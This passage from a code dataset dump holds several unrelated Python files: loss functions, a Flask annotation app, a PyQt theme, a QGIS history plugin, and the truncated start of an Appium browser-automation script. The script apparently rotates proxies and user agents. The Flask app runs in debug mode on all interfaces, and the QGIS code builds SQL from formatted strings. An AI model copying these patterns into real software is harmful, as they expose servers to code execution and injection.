true_label_score[not_other]\n not_other_label = label[not_other]\n class_loss = F.cross_entropy(true_label_score_not_other, not_other_label)\n return binary_loss + class_loss\n\n\ndef rank_loss(score, label, margin=1., gamma=1.):\n \"\"\" Santos(2015). Classifying Relations by Ranking with Convolutional Neural Networks. ACL.\n\n\n Args:\n score: (batch_size, 18)\n label: (batch_size)\n\n Returns: rank loss\n\n \"\"\"\n # print(score.shape, label.shape)\n\n mask = label != 18 # create a mask and set the positive score for \"Other\" label to be zero.\n\n label_without_other = label.clone()\n label_without_other[mask == 0] = 0 # set other label to anything else\n\n score_label = torch.gather(score, dim=1, index=label_without_other.unsqueeze(-1)).squeeze(1)\n\n # print(score_label.shape)\n # print(mask.shape)\n\n # select negative label with maximum score\n _, top_2_index = torch.topk(score, k=2, dim=-1)\n # select the top 2 index that doesn't equal to label\n largest_index = top_2_index[:, 0]\n second_largest_index = top_2_index[:, 1]\n final_index = largest_index.clone()\n final_index[largest_index == label] = second_largest_index[largest_index == label]\n\n # print(final_index.shape)\n # print(final_index.type())\n\n negative_label_score = score.gather(dim=1, index=final_index.unsqueeze(-1)).squeeze(1)\n\n if torch.cuda.is_available():\n positive_score = torch.log1p(torch.exp(gamma * (margin - score_label))) * mask.type(torch.cuda.FloatTensor)\n else:\n positive_score = torch.log1p(torch.exp(gamma * (margin - score_label))) * mask.type(torch.FloatTensor)\n negative_score = torch.log1p(torch.exp(gamma * (-margin + negative_label_score)))\n\n # print(positive_score.shape, negative_score.shape)\n\n return (positive_score + negative_score).mean()\n\n\ndef rank_loss_classifier(score):\n \"\"\" Santos(2015). Classifying Relations by Ranking with Convolutional Neural Networks. ACL.\n if all the score are less than zero. Then, set it to 18. Otherwise, pick the largest one.\n\n Args:\n score: (batch_size, 18)\n\n Returns: classified label (batch_size)\n\n \"\"\"\n label = torch.max(score, 1)[1].data\n mask = (score < 0).all(dim=1)\n label[mask == 1] = 18\n return label\n\n\ndef get_loss(type='cross_entropy'):\n if type == 'cross_entropy':\n return F.cross_entropy\n\n elif type == 'two_step':\n return two_step_loss\n elif type == 'rank':\n return rank_loss\n\n else:\n raise NotImplementedError\n\n\ndef cross_entropy_classifier(score):\n return torch.max(score, 1)[1].data\n\n\ndef two_step_classifier(score):\n true_label_score, other_label_score = score\n label = torch.max(true_label_score, 1)[1].data\n other_label = torch.max(other_label_score, 1)[1].data\n label[other_label == 0] = 18\n return label\n\n\ndef get_classifier(type='cross_entropy'):\n if type == 'cross_entropy':\n return cross_entropy_classifier\n elif type == 'two_step':\n return two_step_classifier\n elif type == 'rank':\n return rank_loss_classifier\n\n\ndef get_loss_classifier(type='cross_entropy'):\n return get_loss(type), get_classifier(type)\n","sub_path":"hw2/models/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304869144","text":"import pandas as pd\r\n\r\ndata1 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_3_9101.csv')\r\ndata2 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_5_9123.csv')\r\ndata3 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_6_9139.csv')\r\ndata4 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_7_9144.csv')\r\ndata5 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_8_9144.csv')\r\n\r\n\r\ndata = pd.DataFrame()\r\ndata['row_id'] = data1['row_id']\r\ndata['r1'] = data1['shop_id']\r\ndata['r2'] = data2['shop_id']\r\ndata['r3'] = data3['shop_id']\r\ndata['r4'] = data4['shop_id']\r\ndata['r5'] = data5['shop_id']\r\ndata.index = [i for i in range(len(data))]\r\ndata['shop_id'] = None\r\nfor i in range(len(data)):\r\n print(i)\r\n shop = {}\r\n for j in range(len(data.columns)-1):\r\n shop_id = data.ix[i,j+1]\r\n shop[shop_id] = shop.get(data.iloc[i,j+1],0) + 1\r\n sort_shop = sorted(shop.items(),key=lambda x:x[1],reverse=True)\r\n pre_shop_id = sort_shop[0][0]\r\n data['shop_id'][i] = pre_shop_id\r\n\r\nprint(data)\r\ndata = data[['row_id','shop_id']]\r\ndata.to_csv('pre.csv',index=None)","sub_path":"阿里天池_商铺定位/ronghe_35678.py","file_name":"ronghe_35678.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"103421387","text":"import flask\nimport json\nfrom collections import defaultdict\n\nimport annotator\nimport article\nimport config\nimport reader\nimport writer\nimport numpy as np\nimport pandas as pd\n\nimport model_utils\n\napplication = flask.Flask(__name__)\n\nanne = annotator.Annotator(reader.get_reader(config.reader)(**config.reader_params),\n writer.get_writer(config.writer)(**config.writer_params))\n\nvalid_users = np.loadtxt('usernames.txt', delimiter = ',', dtype = 'str')\nmodel_annotations = json.load(open('data/model_annotations.json'))\n\nall_anns = pd.read_csv('out_fernando.csv');\n\n\"\"\"\nDisplay the main page.\n\"\"\"\n@application.route('/', methods=['GET'])\ndef index():\n return flask.render_template('index.html')\n\n\"\"\"\nStart the program.\n\"\"\"\n@application.route('/start//', methods=['GET', 'POST'])\ndef start(userid):\n if not(userid in valid_users):\n return flask.render_template('index_invalid_user.html')\n \n id_ = anne.get_next_file(userid)\n if not id_:\n return flask.redirect(flask.url_for('finish'))\n else:\n return flask.redirect(flask.url_for('annotate_full', \n userid = userid, \n id_ = id_))\n \n\"\"\"\nStart the program, but show the error to the user first.\n\"\"\"\n@application.route('/invalid_user/', methods=['GET', 'POST'])\ndef invalid_user():\n userid = flask.request.form['userid']\n if not(userid in valid_users):\n return flask.render_template('index_invalid_user.html', should_show = \"true\")\n \n id_ = anne.get_next_file(userid)\n if not id_:\n return flask.redirect(flask.url_for('finish'))\n else:\n return flask.redirect(flask.url_for('annotate_abstract', \n userid = userid, \n id_ = id_))\n\n\"\"\"\nDisplay just the abstract.\n\"\"\" \n@application.route('/annotate_abstract///', methods=['GET'])\ndef annotate_abstract(userid, id_ = None):\n if id_ is None:\n art = anne.get_next_article(userid)\n else:\n art = anne.get_next_article(userid, id_)\n \n \n if not art:\n return flask.redirect(flask.url_for('finish'))\n else:\n save_last_path(userid, art.get_extra()['path'])\n return flask.render_template('article.html',\n userid = userid,\n id = art.id_,\n pid = id_,\n tabs = json.dumps(art.text),\n xml_file = art.get_extra()['path'],\n outcome = art.get_extra()['outcome'],\n intervention = art.get_extra()['intervention'],\n comparator = art.get_extra()['comparator'],\n options = config.options_full)\n\n\"\"\"\nGrabs a specified article and displays the full text.\n\"\"\" \n@application.route('/annotate_full///', methods=['GET'])\ndef annotate_full(userid, id_ = None):\n if id_ is None:\n art = anne.get_next_article(userid)\n else:\n art = anne.get_next_article(userid, id_)\n\n if not art:\n return flask.redirect(flask.url_for('finish'))\n \n anns = [];\n for idx, a in all_anns.iterrows():\n if str(a['RowID']) == id_.replace('PMC', ''):\n data = { 'idx': idx }\n for k in ['Intervention', 'Comparator', 'Outcome']:\n data[k] = a[k]\n anns.append(data)\n\n save_last_path(userid, art.get_extra()['path'])\n return flask.render_template('full_article.html',\n userid = userid,\n annotations = anns,\n id = art.id_,\n pid = id_,\n tabs = art.text,\n xml_file = get_last_path(userid),\n outcome = art.get_extra()['outcome'],\n intervention = art.get_extra()['intervention'],\n comparator = art.get_extra()['comparator'],\n options = config.options_full)\n\n\"\"\"\nGrabs a specified article and displays the full text.\n\"\"\" \n@application.route('/browse///', methods=['GET'])\ndef browse(userid, id_ = None):\n try:\n if id_ is None:\n art = anne.get_next_article(userid)\n else:\n art = anne.get_next_article(userid, id_)\n except:\n return annotate_abstract(userid, id_)\n \n if not art:\n return flask.redirect(flask.url_for('finish'))\n else:\n annos = model_annotations['docs'][id_]\n return flask.render_template('browse_article.html',\n userid = userid,\n id = art.id_,\n pid = id_,\n tabs = art.text,\n spans = annos,\n xml_file = get_last_path(userid),\n options = config.options_full)\n\n@application.route('/instructions/')\ndef instructions():\n return flask.render_template('instructions.html')\n \n\"\"\"\nSubmits the article id with all annotations.\n\"\"\"\n@application.route('/submit/', methods=['POST'])\ndef submit(): \n userid = flask.request.form['userid']\n anne.submit_annotation(flask.request.form)\n\n id_ = anne.get_next_file(userid)\n if not id_:\n return flask.redirect(flask.url_for('finish'))\n else:\n return flask.redirect(flask.url_for('annotate_full', userid = userid, id_ = id_))\n\n\"\"\"\nOnly go to this if there are no more articles to be annotated.\n\"\"\"\n@application.route('/finish/', methods=['GET'])\ndef finish():\n return flask.render_template('finish.html')\n\n\"\"\"\nCall the get results funciton.\n\"\"\"\n@application.route('/results/', methods=['GET'])\ndef results():\n return anne.get_results()\n \n\"\"\"\nGet the last path.\n\"\"\"\ndef get_user_progress_fname(user):\n return 'data/{}_progress.txt'.format(user)\n\ndef get_last_path(user):\n return open(get_user_progress_fname(user)).read()\n \ndef save_last_path(user, path):\n with open(get_user_progress_fname(user), 'w') as fp:\n fp.write(path)\n\n\"\"\"\nRun the application.\n\"\"\"\nif __name__ == '__main__':\n #application.run()\n application.run(host = '0.0.0.0', port = 8001, debug = True) \n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"27540699","text":"#! /usr/bin/env python3\n# coding : utf-8\n\n\nimport os\nimport argparse\nimport json\n\nimport tqdm\nimport glob\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom functions import read_data, \\\n load_model, load_image, extract_image_id\n\n\ndef encode_image(image):\n features = encoder(image)\n features = np.squeeze(features)\n\n return features\n\ndef main():\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-d\", \"--data_dir\", required=True,\n help=\"Path to the images directory\")\n ap.add_argument(\"-m\", \"--model_path\", required=True,\n help=\"Path to the the model\")\n ap.add_argument(\"-i\", \"--input\", type=int, required=True, default=299,\n help=\"The input size\")\n ap.add_argument(\"-o\", \"--output\", required=True,\n help=\"Path to the output file\")\n\n args = vars(ap.parse_args())\n size = args['input']\n\n # model\n print(\"Loading model...\")\n subdir = args[\"model_path\"]\n model_path = glob.glob(subdir+'*.h5')[-1]\n model = load_model(model_path)\n\n # data\n print(\"Reading data...\")\n filenames, _, _ = read_data(args[\"data_dir\"])\n n_files = len(filenames)\n\n # encoding\n print(\"Encoding images...\")\n index_to_filename = {}\n filename_to_path = {}\n features = np.zeros((n_files, model.output.shape[1]))\n for i in tqdm.tqdm(range(n_files)):\n image_id = extract_image_id(filenames[i])\n index_to_filename[i] = image_id\n filename_to_path[image_id] = filenames[i]\n #print(\"->\", image_id)\n image = load_image(filenames[i], (size, size))\n image = image.reshape((1,)+image.shape)\n\n features[i] = np.squeeze(model(image))\n\n # save transfer values\n np.save(args[\"output\"], features)\n with open(\"index_to_filename.json\", \"w\") as f:\n json.dump(index_to_filename, f, indent=4, ensure_ascii=False)\n with open(\"filename_to_path.json\", \"w\") as f:\n json.dump(filename_to_path, f, indent=4, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9958028","text":"import sys\n\nfrom PyQt5.QtCore import QMetaObject, Qt, pyqtSignal, pyqtSlot\nfrom PyQt5.QtGui import QColor, QIcon, QPalette\nfrom PyQt5.QtWidgets import QApplication, QHBoxLayout, QLabel, QSizePolicy, QToolButton, QVBoxLayout, QWidget\n\nfrom resources.style import resources\n\nSTYLESHEET = 'resources/style/style.qss'\nDARK_WINDOW_STYLESHEET = 'resources/style/stylesheet.css'\n\n\nclass TitleBar(QWidget):\n double_clicked = pyqtSignal()\n\n def __init__(self, window, parent=None):\n QWidget.__init__(self, parent)\n\n self.__window = window\n self.__window_pos = None\n\n self.__mouse_pos = None\n self.__mouse_clicked = False\n\n def mousePressEvent(self, event):\n self.__mouse_clicked = True\n self.__mouse_pos = event.globalPos()\n self.__window_pos = self.__window.pos()\n\n def mouseMoveEvent(self, event):\n if self.__mouse_clicked:\n self.__window.move(self.__window_pos + (event.globalPos() - self.__mouse_pos))\n\n def mouseReleaseEvent(self, event):\n self.__mouse_clicked = False\n\n def mouseDoubleClickEvent(self, event):\n self.double_clicked.emit()\n\n\nclass DarkWindow(QWidget):\n def __init__(self, application, window_content, parent=None):\n QWidget.__init__(self, parent)\n\n self.content = window_content\n\n self.setup_ui()\n self.setup_palette(application)\n self.setup_events()\n\n def setup_ui(self):\n self.dark_layout = QVBoxLayout(self)\n self.dark_layout.setContentsMargins(0, 0, 0, 0)\n\n self.window_frame = QWidget(self)\n self.window_frame.setObjectName('window_frame')\n\n self.window_layout = QVBoxLayout(self.window_frame)\n self.window_layout.setContentsMargins(0, 0, 0, 0)\n\n self.title_bar = TitleBar(self, self.window_frame)\n self.title_bar.setObjectName('title_bar')\n self.title_bar.setSizePolicy(QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Fixed))\n\n self.window_title = QLabel()\n self.window_title.setObjectName('window_title')\n self.window_title.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n\n self.btn_minimize = QToolButton()\n self.btn_minimize.setObjectName('btn_minimize')\n self.btn_minimize.setIcon(QIcon(':/minimize.png'))\n self.btn_minimize.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.btn_restore = QToolButton()\n self.btn_restore.setObjectName('btn_restore')\n self.btn_restore.setIcon(QIcon(':/restore.png'))\n self.btn_restore.setVisible(False)\n self.btn_restore.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.btn_maximize = QToolButton()\n self.btn_maximize.setObjectName('btn_maximize')\n self.btn_maximize.setIcon(QIcon(':/maximize.png'))\n self.btn_maximize.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.btn_close = QToolButton()\n self.btn_close.setObjectName('btn_close')\n self.btn_close.setIcon(QIcon(':/close.png'))\n self.btn_close.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.title_bar_layout = QHBoxLayout(self.title_bar)\n self.title_bar_layout.setContentsMargins(0, 0, 0, 0)\n self.title_bar_layout.setSpacing(0)\n self.title_bar_layout.addWidget(self.window_title)\n self.title_bar_layout.addWidget(self.btn_minimize)\n self.title_bar_layout.addWidget(self.btn_maximize)\n self.title_bar_layout.addWidget(self.btn_restore)\n self.title_bar_layout.addWidget(self.btn_close)\n\n self.window_layout.addWidget(self.title_bar)\n self.window_content = QWidget(self.window_frame)\n self.window_content.setObjectName('window_content')\n self.window_layout.addWidget(self.window_content)\n\n self.dark_layout.addWidget(self.window_frame)\n\n content_layout = QHBoxLayout()\n content_layout.setContentsMargins(0, 0, 0, 0)\n content_layout.addWidget(self.content)\n self.window_content.setLayout(content_layout)\n\n self.setWindowTitle(self.content.windowTitle())\n self.setGeometry(self.content.geometry())\n\n # set window flags\n self.setWindowFlags(Qt.Window | Qt.FramelessWindowHint | Qt.WindowSystemMenuHint | Qt.WindowMinMaxButtonsHint)\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n # set stylesheet\n with open(DARK_WINDOW_STYLESHEET) as stylesheet:\n self.setStyleSheet(stylesheet.read())\n\n # connect slots\n QMetaObject.connectSlotsByName(self)\n\n def setup_palette(self, app):\n app.setStyle('Fusion')\n with open(STYLESHEET) as stylesheet:\n self.setStyleSheet(stylesheet.read())\n\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(53, 53, 53))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(25, 25, 25))\n palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53, 53, 53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Link, QColor(42, 130, 218))\n palette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n palette.setColor(QPalette.HighlightedText, Qt.black)\n\n # disabled\n palette.setColor(QPalette.Disabled, QPalette.WindowText,\n QColor(127, 127, 127))\n palette.setColor(QPalette.Disabled, QPalette.Text,\n QColor(127, 127, 127))\n palette.setColor(QPalette.Disabled, QPalette.ButtonText,\n QColor(127, 127, 127))\n palette.setColor(QPalette.Disabled, QPalette.Highlight,\n QColor(80, 80, 80))\n palette.setColor(QPalette.Disabled, QPalette.HighlightedText,\n QColor(127, 127, 127))\n\n app.setPalette(palette)\n\n def setup_events(self):\n self.content.close = self.close\n self.closeEvent = self.content.closeEvent\n\n def setWindowTitle(self, p_str):\n self.window_title.setText(p_str)\n\n @pyqtSlot()\n def on_btn_minimize_clicked(self):\n self.setWindowState(Qt.WindowMinimized)\n\n @pyqtSlot()\n def on_btn_restore_clicked(self):\n self.btn_restore.setVisible(False)\n self.btn_maximize.setVisible(True)\n\n self.setWindowState(Qt.WindowNoState)\n\n @pyqtSlot()\n def on_btn_maximize_clicked(self):\n self.btn_restore.setVisible(True)\n self.btn_maximize.setVisible(False)\n\n self.setWindowState(Qt.WindowMaximized)\n\n @pyqtSlot()\n def on_btn_close_clicked(self):\n self.close()\n\n @pyqtSlot()\n def on_title_bar_doubleClicked(self):\n if self.btn_maximize.isVisible():\n self.on_btn_maximize_clicked()\n else:\n self.on_btn_restore_clicked()\n\n\nif __name__ == '__main__':\n app = QApplication([])\n test = QWidget()\n\n gui = DarkWindow(app, test)\n gui.setWindowTitle('E7 Gear Optimizer')\n gui.show()\n\n sys.exit(app.exec_())\n","sub_path":"darktheme.py","file_name":"darktheme.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261134449","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport json\n\n\nclass Convert2Json(object):\n recap = False\n chapter = 0\n csv_dict = {}\n\n #Get Command Line Arguments\n def run(self):\n self.read_csv(\"database.csv\", \"database.json\", 1)\n self.read_csv(\"part.csv\", \"part.json\", 0)\n self.read_csv(\"index.csv\", \"index.json\", 2)\n\n def parse_part(self, row):\n fields = row.split(\"::\")\n exists_paragraph = False\n paragraphs = [p['id'] for p in self.csv_dict['paragraph'] if p['chapter'] == int(fields[0])]\n if paragraphs:\n exists_paragraph = True\n return {'id': int(fields[0]),\n 'parent': int(fields[1]),\n 'name': fields[2],\n 'exist_paragraph': exists_paragraph}\n\n def parse_index(self, row):\n fields = row.split(\"::\")\n key_dict = {'Á': 'A', 'Ú': 'U',\n 'Ď': 'D', 'ú': 'u', 'ď': 'd'}\n name = fields[2].strip()\n if name.startswith(\"\"):\n if name.startswith(\"ch\"):\n key = \"ch\"\n else:\n key = name[3]\n else:\n key = name[0]\n if key in key_dict.keys():\n key = key_dict[key]\n refs = self.parse_refs(fields[1])\n return {'see': fields[0], 'refs': refs, 'key': key.upper(), 'name': fields[2].strip()}\n\n def parse_refs(self, refs):\n if '-' in refs:\n list_refs = []\n for r in refs.split(','):\n if '-' in r:\n begin, end = r.split('-')\n list_refs.extend(map(str, range(int(begin), int(end)+1)))\n else:\n list_refs.append(r)\n return ','.join(list_refs)\n else:\n return refs\n\n def parse_database(self, row):\n fields = row.split(\"::\")\n if \"souhrn\" in fields[2].lower():\n self.recap = True\n self.chapter = int(fields[3])\n else:\n try:\n if self.chapter != int(fields[3]) or fields[2] != \"\":\n self.recap = False\n except ValueError:\n fields[3] = 0\n self.recap = False\n refs = self.parse_refs(fields[4])\n return {'id': int(fields[0]),\n 'caption': fields[1],\n 'caption_no_html': fields[2],\n 'chapter': int(fields[3]),\n 'refs': refs,\n 'text': fields[5],\n 'text_no_html': fields[6],\n 'recap': int(self.recap),\n }\n\n #Read CSV File\n def read_csv(self, input_file, output_file, fnc):\n csv_content = []\n if fnc == 0:\n name = \"chapters\"\n elif fnc == 1:\n name = \"paragraph\"\n else:\n name = \"index\"\n with open(input_file, 'r') as csvfile:\n for row in csvfile.readlines():\n if fnc == 0:\n csv_content.append(self.parse_part(row))\n elif fnc == 1:\n csv_content.append(self.parse_database(row))\n else:\n csv_content.append(self.parse_index(row))\n self.write_json(csv_content, name, output_file)\n\n #Convert csv data into json and write it\n def write_json(self, data, name, json_file):\n data_to_write = {name: data}\n self.csv_dict[name] = data\n with open(json_file, \"w\") as f:\n json.dump(data_to_write, f, indent=4, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n cj = Convert2Json()\n cj.run()\n","sub_path":"convert_csv_json.py","file_name":"convert_csv_json.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255114432","text":"# Calculadora do dia que nasceu e quantos ja viveu até hoje\n# Importante escrever a data no formato (dd/mm/aaa)\n# Ex: 18/06/1944\nimport datetime\n\nsemana = ['segunda', 'terça', 'quarta', 'quinta', 'sexta', 'sabado', 'domingo']\n\ndata_quero = input('Digite o dia (dd/mm/aaa): ')\ndata_formatada = datetime.datetime.strptime(data_quero, '%d/%m/%Y')\nhoje = datetime.datetime.today()\ndelta = hoje - data_formatada\n\ndia = 0\n\nfor x in semana:\n if semana.index(x) == data_formatada.weekday():\n dia = x\n\nprint(f'\\nVoce nasceu num(a) {dia}\\n')\nprint(f'Voce ja viveu {delta.days} dias até hoje')\n","sub_path":"diaQueNasci.py","file_name":"diaQueNasci.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111218967","text":"from django.urls import path\nfrom .views import Teams\n\nurlpatterns = [\n path('', Teams.index, name='teams'),\n path('leagues', Teams.teamLeagues, name='teamLeagues'),\n path('leagues/', Teams.teamLeague, name='teamLeague'),\n path('leagues//', Teams.team, name='team'),\n path('search', Teams.search, name='search'),\n]\n\n","sub_path":"teams/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78615077","text":"'''\nCreated on January, 29th 2020\n\n@author: arxit\n'''\nfrom datetime import datetime\nfrom PyQt5.QtCore import QDateTime\nfrom qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsFeatureRequest, Qgis\nfrom qgis.gui import QgisInterface\n\nfrom .histoparam import HistoParamTable\nfrom .layer import Layer\nfrom .histolayer import HistoLayer\nfrom .histoevent import HistoEvent\nfrom .histoeventtype import HistoEventTypeTable\nfrom .historyfeature import HistoryFeature\nfrom .featuremode import Mode\nfrom .valuemap import ValueMap\n\nfrom .widgets.saveManagementTool.saveManagementToolDialog import SaveManagementToolDialog\n\n\nclass MapLayer(Layer):\n def __init__(self, mapLayer: QgsVectorLayer, iface: QgisInterface):\n super().__init__(mapLayer.dataProvider().uri())\n\n self.iface = iface\n self.isValid = False\n\n if type(mapLayer) is not QgsVectorLayer:\n return\n\n if mapLayer.providerType() != \"postgres\":\n return\n\n self.isValid = mapLayer.isValid()\n\n self.mapLayer = mapLayer\n self.listenToCommit = False\n\n self.histoParamTable = HistoParamTable.fromOtherLayerUri(mapLayer.dataProvider().uri())\n self.histoLayer = HistoLayer.fromMapLayerUri(mapLayer.dataProvider().uri(), self.histoParamTable)\n self.histoEvent = HistoEvent.fromOtherLayerUri(mapLayer.dataProvider().uri())\n self.histoEventTypeTable = HistoEventTypeTable.fromOtherLayerUri(mapLayer.dataProvider().uri())\n self._initValueMaps()\n\n def _initValueMaps(self):\n self.valueMaps = []\n\n for field in self.mapLayer.fields():\n if field.editorWidgetSetup().type() == \"ValueMap\":\n self.valueMaps.append(ValueMap.fromValueMapConfig(field.name(), field.editorWidgetSetup().config()))\n if field.editorWidgetSetup().type() == \"ValueRelation\":\n self.valueMaps.append(ValueMap.fromValueRelationConfig(field.name(), field.editorWidgetSetup().config()))\n\n def getVectorLayer(self):\n return self.mapLayer\n\n def isHistorisable(self) -> bool:\n return self.isValid and type(self.mapLayer) is QgsVectorLayer and self.histoParamTable.isValid()\n\n def isAlreadyHistorized(self) -> bool:\n return self.isHistorisable() and self.histoParamTable.containsTableName(self.uri.table())\n\n def setListenToCommit(self, listen: bool):\n if not self.isAlreadyHistorized():\n return\n\n if self.listenToCommit == listen:\n return\n\n if listen:\n self.getVectorLayer().beforeCommitChanges.connect(self.onBeforeCommitChanges)\n self.getVectorLayer().committedFeaturesAdded.connect(self.onCommittedFeaturesAdded)\n self.getVectorLayer().committedAttributeValuesChanges.connect(self.onCommittedAttributeValuesChanges)\n self.getVectorLayer().committedGeometriesChanges.connect(self.onCommittedGeometriesChanges)\n self.getVectorLayer().afterCommitChanges.connect(self.onAfterCommitChanges)\n else:\n self.getVectorLayer().beforeCommitChanges.disconnect(self.onBeforeCommitChanges)\n self.getVectorLayer().committedFeaturesAdded.disconnect(self.onCommittedFeaturesAdded)\n self.getVectorLayer().committedAttributeValuesChanges.disconnect(self.onCommittedAttributeValuesChanges)\n self.getVectorLayer().committedGeometriesChanges.disconnect(self.onCommittedGeometriesChanges)\n self.getVectorLayer().afterCommitChanges.disconnect(self.onAfterCommitChanges)\n\n def historizeTable(self, displayField: str, idField: str):\n now = QDateTime.currentDateTime()\n\n codeFields = []\n\n for valueMap in self.valueMaps:\n codeFields.append(valueMap.sourceFieldName)\n\n query = \"SELECT {0}.create_h_table('{0}', '{1}', '{2}', ARRAY[{3}]::text[] );\".format(self.uri.schema(), self.uri.table(),\n self.uri.geometryColumn(), \"'{0}'\".format(\"','\".join(codeFields)) if len(codeFields) > 0 else \"\")\n conn = self.getSqlConnection()\n cursor = conn.cursor()\n cursor.execute(query)\n data = cursor.fetchone()\n conn.commit()\n\n eventId = self.histoEvent.addEvent(0, \"Historisation de la table \" + self.uri.table(), now)\n\n self.histoParamTable.addTableName(self.uri.table(), displayField, idField)\n\n self.histoLayer = HistoLayer.fromMapLayerUri(self.mapLayer.dataProvider().uri(), self.histoParamTable)\n\n self.histoLayer.initializeTable(now, eventId, self.valueMaps)\n\n def onBeforeCommitChanges(self):\n # For added and modified, process after commit for DB default values\n self.added = []\n self.modifiedGeometries = []\n self.modifiedAttributes = []\n\n # For deleted, process before commit\n editBuffer = self.getVectorLayer().editBuffer()\n deletedIds = editBuffer.deletedFeatureIds()\n self.deleted = [] if len(deletedIds) == 0 else list(self.getDatabaseFeatures(QgsFeatureRequest(deletedIds)))\n\n def onCommittedFeaturesAdded(self, layerId, addedFeatures):\n self.added = addedFeatures\n\n def onCommittedAttributeValuesChanges(self, layerId, changedAttributesValues):\n self.modifiedAttributes = changedAttributesValues\n\n def onCommittedGeometriesChanges(self, layerId, changedGeometries):\n self.modifiedGeometries = changedGeometries\n\n def onAfterCommitChanges(self):\n # Get modifications\n addedIds = list(map(lambda x: x.id(), self.added))\n added = [] if len(addedIds) == 0 else list(self.getFeatures(QgsFeatureRequest(addedIds)))\n\n modifiedIds = list(set(list(self.modifiedGeometries)+list(self.modifiedAttributes)))\n modified = [] if len(modifiedIds) == 0 else list(self.getFeatures(QgsFeatureRequest(modifiedIds)))\n\n deleted = list(self.deleted)\n\n # Get user events\n dlg = SaveManagementToolDialog(self.getVectorLayer().name(), self.uri.table(), self.histoParamTable, self.histoEventTypeTable, added, modified, deleted)\n dlg.exec()\n\n # Add events\n eventDate = QDateTime.currentDateTime()\n eventMap = dict()\n\n for index, event in enumerate(dlg.finalEvents()):\n (type, description) = event\n eventId = self.histoEvent.addEvent(type, description, eventDate)\n eventMap[index] = eventId\n\n # History features\n self.histoLayer.startEditing()\n\n for historyFeature in dlg.finalFeaturesToHistorize():\n if historyFeature.mode.mode == Mode.Ajout:\n self.histoLayer.addHistoFeature(historyFeature.feature, eventDate, eventMap[historyFeature.eventIndex], self.valueMaps)\n elif historyFeature.mode.mode == Mode.Modification:\n self.histoLayer.updateHistoFeature(historyFeature.feature, eventDate, eventMap[historyFeature.eventIndex], self.valueMaps)\n elif historyFeature.mode.mode == Mode.Suppression:\n self.histoLayer.deleteHistoFeature(historyFeature.feature, eventDate, eventMap[historyFeature.eventIndex])\n\n self.histoLayer.commitChanges()\n\n self.iface.messageBar().pushMessage(\"Information\", \"L'historisation des objets est terminée\", Qgis.Info)\n","sub_path":"Historisation/maplayer.py","file_name":"maplayer.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"586712822","text":"# 需要安装客户端的包\n# pip install Appium-Python-Client\nimport os\nimport random\nimport re\nimport subprocess\nimport time\nimport traceback\nfrom multiprocessing import Pool\n\nimport jieba\nimport requests\nfrom appium import webdriver\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\nfrom selenium.webdriver.common.keys import Keys\n\nfrom APP_UA import UA\n\n\n# 主动报错类\nclass CustomError(Exception):\n def __init__(self, ErrorInfo):\n super().__init__(self) # 初始化父类\n self.errorinfo = ErrorInfo\n\n def __str__(self):\n return self.errorinfo\n\n\nclass Chrom_Run():\n def __init__(self, Cellphone_id, Mitmproxy_port, Appium_port):\n self.mitmproxy_port = Mitmproxy_port\n self.Appium_port = Appium_port\n # redis 数据库连接\n # self.pool = redis.ConnectionPool(host='localhost', port=6379, db=1)\n # self.redis = redis.Redis(connection_pool=self.pool)\n # self.redis.set('ips', 'A')\n self.UA = UA\n self.ip_url = 